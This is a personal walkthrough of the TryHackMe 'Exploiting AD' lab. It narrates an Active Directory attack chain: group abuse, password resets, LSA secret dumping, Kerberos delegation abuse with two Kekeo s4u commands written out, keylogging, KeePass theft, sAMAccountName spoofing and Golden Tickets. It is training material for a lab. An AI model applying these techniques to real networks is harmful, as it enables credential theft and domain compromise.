Exploiting Active Directory

As the fourth room in a five-part series, this room is a must-do for anyone looking to master the art of AD hacking. With in-depth coverage of a variety of topics, from escalation to pivoting, this room will equip you with the tools and techniques you need to navigate even the most complex AD environments.

While some of the screenshots may lack detailed explanations or in-depth discussion (this is primarily for my own reference), there's no denying the immense value this room offers to anyone looking to improve their AD hacking skills.

So why wait? Sign up for TryHackMe today and start exploring the Exploiting AD room. With so much to learn and discover, you're sure to come away with a wealth of knowledge and insights that will help you take your AD hacking skills to the next level.

In other TryHackMe rooms such as "Breaching AD" and "Lateral Movement," you will have learned how to gain initial access and obtain user credentials. In the first part of "Exploiting AD," we have simulated that we have obtained user creds and will use it in tandem with "BloodHound" and "SharpHound" to enumerate the AD environment.

After we upload our SharpHound data into Bloodhound we can see that Domain Users have generic write privileges to the IT Support Group. This is our first step in a multi-step attack methodology. Since we have user creds "Justin Barnes", we quickly ssh into our foothold box and begin our approach.

The generic write privileges allow us to add "Justin Barnes" to the IT support group.

The great thing here is that we can see IT support users have a path to Tier 2 users group which is always great for escalating between user groups. Since we added "Justin Barnes" to the IT support group we have the right to change passwords for users in the "TIER 2 Admins" group.

Next, we need to enumerate the "Tier 2 Admins" group, choose a user, and modify their password.

Now that we can modify "t2_melaine.davies" password, we will use it later for "Tier 2 Admin" stuff. In the meanwhile, let us whip out Metasploit and see what we can do with our first box.

As you can see below we now have a meterpreter session as "t2_melaine.davies". Note: In order to gain shell as "t2_melaine.davies" I simply did a gpupdate /force, logged out of box as "Justin Barnes", waited 10 mins for AD to sync, and then used evil-winrm to gain a session to THMWRK1 box as "t2_melaine.davies".

I was able to run get system and dumps lsa secrets which ultimately gave me the "svcIIS" account password. I've redacted it for obvious reasons. ;) But why are we wanting "svcIIS" password? Using the "Get-NetUser" cmdlet from PowerSploit we will see that "svcIIS" has the ability to delegate HTTP and WSMAN services on THMSERVER1. What's so special about that? We need to pivot and keep going up the chain!!

But first we need to jump from THMWRK1 to THMSERVER1. But how?????

Let's use Kekeo to generate tickets and then use Mimikatz to load those tickets into memory using the "svcIIS" account and a new user we can pull from Tier 1 users group.

On our foothold box "THMWRK1" let's run Get-ADGroupMember -Identity "Tier 1 Admins" and choose a TIer 1 user.

tgs::s4u /tgt:[email protected][email protected] /user:t1_steven.blake /service:http/THMSERVER1.za.tryhackme.loc

tgs::s4u /tgt:[email protected][email protected] /user:t1_steven.blake /service:wsman/THMSERVER1.za.tryhackme.loc

After we have a session we can create a msfvenom payload and pull it down on THMSRV1 for a better foothold and more flexibility with additional modules.

After gaining access to THMSRV1 we've successfully escalated to system as seen above. But first, let's see if we can migrate into explore process and hopefully capture keystrokes from user "trevor"

Next, let's download PasswordDatabse.kdbx and view it using keepassx

Looks like we now have svcServMan password which we can use to pivot to THMSRV2!!!

After we gain access to THMSERVER2 I decided to cut to the chase and Sam the Admin.

Next on our to-do list is jump from THMCHILDDC to THMROOTDC

First, we need the sid of THMROOTDC. If we jump back over to THMSERVER2 we can grab it using our AD modules on that host.

Since we have a session on the DC from Exploiting CVE-2021-42278 (sAMAccountName spoofing) we can create msfvenom payload and grab a meterpreter session.

Time for the Golden Ticket!!

As you can see we have cmd execution on THM Root DC!!!